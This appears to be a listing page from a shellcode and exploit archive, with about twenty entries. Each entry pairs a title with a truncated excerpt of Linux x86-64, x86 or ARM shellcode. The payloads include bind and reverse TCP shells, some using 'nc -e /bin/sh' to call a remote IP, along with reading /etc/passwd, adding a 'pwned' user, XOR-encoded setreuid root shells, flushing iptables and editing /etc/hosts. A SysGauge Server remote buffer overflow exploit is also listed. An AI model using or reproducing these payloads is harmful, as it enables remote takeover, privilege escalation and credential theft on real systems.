Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)

/ Shell Bind TCP Random Port Shellcode - C Language - Linux/x8664 Copyright C 2013 Geyslan G. Bem, Hacking bits http://hackingbits.com email protected This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...

Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)

; Author Doreth.Z10 ; ; Linux x8664 Egghunter using sysaccess ; Shellcode size 49 bytes ; global start section .text start: xor rsi, rsi ; Some prep junk. push rsi pop rdx push 8 pop rbx goendofpage: or dx, 0xfff ; We align with a page size of 0x1000 nextbyte: inc rdx ; next byte offset push 21 p...

Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)

; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-867.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 105 bytes got shorter by 13 bytes ; ; What's new is that some...

Linux/x86-64 - setreuid(0,0) + execve(/bin/ash,NULL,NULL) + XOR Encoded Shellcode (85 bytes)

Title: Linux x86-64 setreuid 0,0 & execve"/bin/ash",NULL,NULL + XOR encoded - 85 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...

Linux/x86-64 - Add User (pwned/$pass$) Using open,write,close Shellcode (358 bytes)

; shellcode name adduserpasswordJCPopen,write,close ; Author : Christophe G SLAE64-1337 ; Len : 358 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with open,write,close ; tested kali linux , kernel 3.12 global start start: xor rax , rax push rax pop rsi push rax ...

Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)

; shellcode name adduserpassword ; Author : Christophe G SLAE64-1337 ; Len : 273 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with echo cmd ; tested kali linux , kernel 3.12 global start start: jmp short findaddress realstart: pop rdi xor byte rdi + 7 , 0x41 ;...

Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)

/ Title : reversetcpbindshell 118 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: ...

Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 byte

; Title: Shellcode linux/x86-64 connect back shell ; Author : Gaussillusion ; Len : 109 bytes ; Language : Nasm ;syscall: execve"/bin/nc","/bin/nc","ip","1337","-e","/bin/sh",NULL BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr...

Linux/x86-64 - setreuid(0,0) + execve(/bin/ksh, [/bin/ksh, NULL]) + XOR Encoded Shellcode (87 bytes)

Title: Linux x86-64 setreuid 0,0 & execve"/bin/ksh", "/bin/ksh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...

Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)

; Title: Shellcode linux/x86-64 bind-shell with netcat ; Author : Gaussillusion ; Len : 131 bytes ; Language : Nasm BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr rcx,0x08 push rcx mov rcx,rsp mov rbx,0x652dffffffffffff shr rbx,0x30...

Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)

BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x8664 Shellcode ; Shellcode size 82 bytes global start section .text start: jmp pushfilename readfile: ; syscall open file pop rdi ; pop path value ; NULL byte fix xor byte rdi + 11, 0x41 xor rax, rax add al, 2 xor rsi, rsi ; s...

Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)

;Exam Assignment 3 ;implementation of egghunter ;Default egg = "deaddead" ; ;If connected the stager check of egg , if present execute the code ; ;You can send a maximum of 255 bytes egg + code ; ;if no egg , shellcode exit ; ;Christophe G SLAE64 - 1337 ; global start jmp short start startcode :...

Linux/x86-64 - setreuid(0,0) + execve(/bin/csh, [/bin/csh, NULL]) + XOR Encoded Shellcode (87 bytes)

Title: Linux x86-64 setreuid 0,0 & execve"/bin/csh", "/bin/csh", NULL + XOR encoded - 87 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Mark Loiseau, entropy at phiral.net and metasm developer unsigned char shellcode =...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)

Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh + Password MyPasswd + Null-Free Shellcode 156 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Autho...

Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)

Linux/x8664 sethostname & killall 33 bytes shellcode Date: 2010-04-26 Author: zbt Tested on: x8664 Debian GNU/Linux / ; sethostname"Rooted !"; ; kill-1, SIGKILL; section .text global start start: ;-- setHostName"Rooted !"; 22 bytes --; mov al, 0xaa mov r8, 'Rooted !' push r8 mov rdi, rsp mov sil,...

Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)

;BindTCP 4444 with password ; ;Default password = Password ; ;If connected the shellcode no prompt for password ; ;Enter password directly and you get the bin/sh shell; ;if password is wrong the shellcode exit: ; ;Christophe G SLAE64 - 1337 size 173 bytes ; global start start: ; sock =...

SysGauge Server 3.6.18 - Remote Buffer Overflow

Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow Exploit Author: Ahmad Mahfouz Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH Contact: http://twitter.com/eln1x Date: 12/01/2018 CVE: CVE-2018-5359 Version: 3.6.18 Tested on: Windows 7 x64 Software Link:...

Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)

Linux/x86 - execve/bin/sh + Polymorphic Shellcode 26 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell...

Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)

Linux/x86-64 - Add Map 127.1.1.1 google.lk In /etc/hosts Shellcode 96 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push...

Linux/x86-64 - Flush IPTables Rules (execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)) Shellcode (43 bytes)

Linux/x86-64 - Flush IPTables Rules execve"/sbin/iptables", "/sbin/iptables", "-F", NULL Shellcode 43 bytes. Shellcode ... / section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f...